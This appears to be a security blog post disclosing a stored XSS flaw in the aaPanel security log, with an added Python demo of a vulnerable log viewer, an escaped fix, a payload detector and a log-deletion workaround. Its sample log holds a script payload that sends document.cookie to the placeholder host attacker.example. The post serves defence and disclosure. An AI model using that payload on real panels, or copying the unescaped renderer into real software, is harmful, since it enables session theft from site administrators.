aaPanel security log is vulnerable to stored XSS - PC✗3
aaPanel is one of my favorite free hosting panels because it is lightweight and simple to use.

The panel gets regular updates, and it offers several unique features that you only get in premium panels like cPanel, but I believe the greatest obstacle to it getting more popular is that it is still just an English version of the Pagoda panel.

aaPanel would gain popularity among Western and European hosting businesses if it were completely separated from the Pagoda panel.


Recently, an XSS vulnerability in aaPanel was discovered and is being exploited in the wild: a stored XSS vulnerability exists in the aaPanel security log.

Vulnerability

aaPanel has a security log that records brute-force attempts and failed logins. The entries are built from the incoming request, so if an attacker puts HTML or JavaScript into parts of the request header, that payload is written to the log file verbatim. Because the panel displays the log without escaping what it reads, the payload is rendered as live markup and executed in the browser of the next website owner who opens the security log. The attacker needs no account on the panel; a single failed login with a crafted header is enough to plant the payload, which is what makes this a stored rather than reflected XSS.
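To make the mechanism concrete, here is an added example in Python; it is not aaPanel's code (the panel's real log viewer is not on this page). It contains a small parser for nginx combined-format access logs, a viewer that builds the HTML table by string concatenation (the vulnerable pattern), the same viewer with `html.escape` applied to every logged field, and a detector that flags existing log entries carrying markup in the request line, Referer or User-Agent so an admin can check the logs before opening them in a browser. The three log lines are constructed for the example and the host `attacker.example` is a placeholder. nginx escapes `"` and `\` in the User-Agent when it writes the log, but not `<` and `>`, which is why a payload using single quotes survives intact.

```python
"""Stored XSS through a log viewer: vulnerable rendering, escaped rendering,
and a detector for HTML in logged request headers.

Added example, not aaPanel's code. Log lines are constructed for this demo.
"""
import html
import re

# Constructed sample lines in nginx "combined" format (not real traffic).
# The second line carries the payload in the User-Agent header.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Apr/2022:10:01:12 +0000] "POST /login HTTP/1.1" 403 152 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [08/Apr/2022:10:01:15 +0000] "POST /login HTTP/1.1" 403 152 "-" "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
198.51.100.9 - - [08/Apr/2022:10:02:40 +0000] "GET /wp-login.php HTTP/1.1" 403 0 "-" "curl/7.81.0"
"""

# nginx "combined" log format: ip ident user [time] "request" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

FIELDS = ("ip", "time", "request", "status", "agent")


def parse_combined(text):
    """Parse combined-format lines into dicts; lines that don't match are skipped."""
    entries = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def render_log_vulnerable(entries):
    """Builds the log table the way a vulnerable viewer does: raw string
    concatenation, so '<script>' logged in the User-Agent becomes live markup."""
    rows = "".join(
        "<tr>" + "".join(f"<td>{e[k]}</td>" for k in FIELDS) + "</tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


def render_log_escaped(entries):
    """Same table, but every logged field is HTML-escaped before it is placed
    in the page, so the payload is displayed as text instead of executed."""
    rows = "".join(
        "<tr>" + "".join(f"<td>{html.escape(e[k], quote=True)}</td>" for k in FIELDS) + "</tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


# Coarse detector: an opening/closing tag, a javascript: URL, or an on*= handler.
HTML_PAYLOAD_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def find_suspicious_entries(entries):
    """Return (ip, field, value) for entries whose request line, Referer or
    User-Agent contains markup. Run this over existing logs before an admin
    opens them in a viewer that may render them unescaped."""
    hits = []
    for e in entries:
        for field in ("request", "referer", "agent"):
            if HTML_PAYLOAD_RE.search(e[field]):
                hits.append((e["ip"], field, e[field]))
                break
    return hits


if __name__ == "__main__":
    parsed = parse_combined(SAMPLE_LOG)
    print("vulnerable viewer contains raw <script>:", "<script>" in render_log_vulnerable(parsed))
    print("escaped viewer contains raw <script>:", "<script>" in render_log_escaped(parsed))
    for ip, field, value in find_suspicious_entries(parsed):
        print(f"suspicious entry from {ip} in {field}: {value}")
```

The escaped renderer is the actual fix a log viewer needs: treat every logged field as untrusted text and escape it at output time (or let a templating engine with autoescaping do it). The detector is only a triage aid; it will miss encoded payloads and is meant to tell you whether a log that is about to be opened already contains something that should not be rendered.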


The problem was initially reported on the aaPanel forums on April 8th, and I'll keep a watch on the changelog to see when it's fixed.


Workaround

Until the issue is fixed and an update is available to the public, the following workaround can be applied. It removes the log files that hold the injected payload; it does not close the injection path, so it is a stop-gap rather than a fix.

Step 1. Rename the site's log directory /www/wwwlogs. If you still need the access and error logs for forensics, copy them somewhere outside the web root first, because the following steps discard them.

Step 2. Restart the web server after making the change. The server keeps writing to its already-open log files even after the directory is renamed, so a restart is what makes it release the old files and start fresh.

Step 3. Delete the renamed directory (the old contents of /www/wwwlogs), which is where the stored payload lives. Do not open the old logs in the panel's security log view in the meantime.

whoami
Stefan Pejcic